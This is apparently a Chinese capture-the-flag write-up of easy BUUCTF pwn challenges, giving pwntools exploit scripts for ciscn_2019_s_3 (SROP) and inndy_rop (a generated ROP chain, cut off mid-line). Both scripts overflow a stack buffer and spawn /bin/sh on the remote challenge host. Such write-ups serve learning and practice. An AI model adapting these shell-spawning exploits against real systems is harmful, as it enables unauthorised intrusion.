BUUCTF pwn水题大赏
ciscn_2019_s_3
srop，要注意 rsp 指向的位置。
exp:
from pwn import*
# NOTE: this is a Python 2 script (print statement on the leak line; str
# concatenation of str(exe)); it will not run unchanged under Python 3.
context.log_level = 'DEBUG'
# context.arch must be amd64 so SigreturnFrame() lays out a 64-bit frame.
context.arch = 'amd64'
# Remote BUUCTF challenge instance; the commented line is the local variant.
p = remote('node3.buuoj.cn',29369)
#p = process('./ciscn_s_3')
elf = ELF('./ciscn_s_3')
# Hard-coded gadget addresses from the write-up (the binary is apparently
# non-PIE, so they are used as absolute addresses and not resolved via `elf`).
syscall_ret = 0x400517   # syscall ; ret
start_addr = 0x04004ED   # address returned to in stage 1 (entry/restart of the vulnerable routine, presumably)
sigret = 0x4004DA        # presumably the gadget that sets up the sigreturn syscall -- confirm in the disassembly
# Stage 1: fill the buffer with "/bin/sh\0" and overwrite the return address
# with start_addr. The response is expected to echo stack contents: the first
# 0x20 bytes are skipped, the next qword is read as a stack pointer and the
# constant 0x118 is the offset between that pointer and the "/bin/sh" string.
payload1 = '/bin/sh\x00'*2+p64(start_addr)
p.send(payload1)
# Short pause so the service's output is available before recv().
sleep(0.1)
p.recv(0x20)
binsh = u64(p.recv(8))-0x118
print hex(binsh)
###gdb.attach(p)
# Stage 2: build a sigreturn frame. When rt_sigreturn consumes it the registers
# are set to rax = SYS_execve, rdi = binsh, rsi = rdx = 0, rip = syscall_ret,
# i.e. the syscall gadget then executes execve(binsh, NULL, NULL).
exe = SigreturnFrame()
exe.rax = constants.SYS_execve
exe.rdi = binsh
exe.rsi = 0
exe.rdx = 0
exe.rip = syscall_ret
# Same overflow again: padding, then the sigreturn-setup gadget, then the
# syscall gadget, then the frame itself at the top of the stack.
payload2='/bin/sh\x00'*2+p64(sigret)+p64(syscall_ret)+str(exe)
p.sendline(payload2)
p.interactive()
inndy_rop
很奇怪的一道题，简单的栈溢出，但是 rop 链不需要自己写。ROPgadget 有一个功能，可以直接构造 rop 链。
ROPgadget --binary rop --ropchain
exp:
from pwn import*
from struct import pack
context.log_level = 'DEBUG'
i=remote('node3.buuoj.cn',29638)
#i=process('./rop')
elf=ELF('./rop')
p = 'a'*16
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080b8016) # pop eax ; ret
p += '/bin'
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea064) # @ .data + 4
p += pack('<I', 0x080b8016) # pop eax ; ret
p += '//sh'
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x080492d3) # xor eax, eax ; ret
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080481c9) # pop ebx ; ret
p += pack(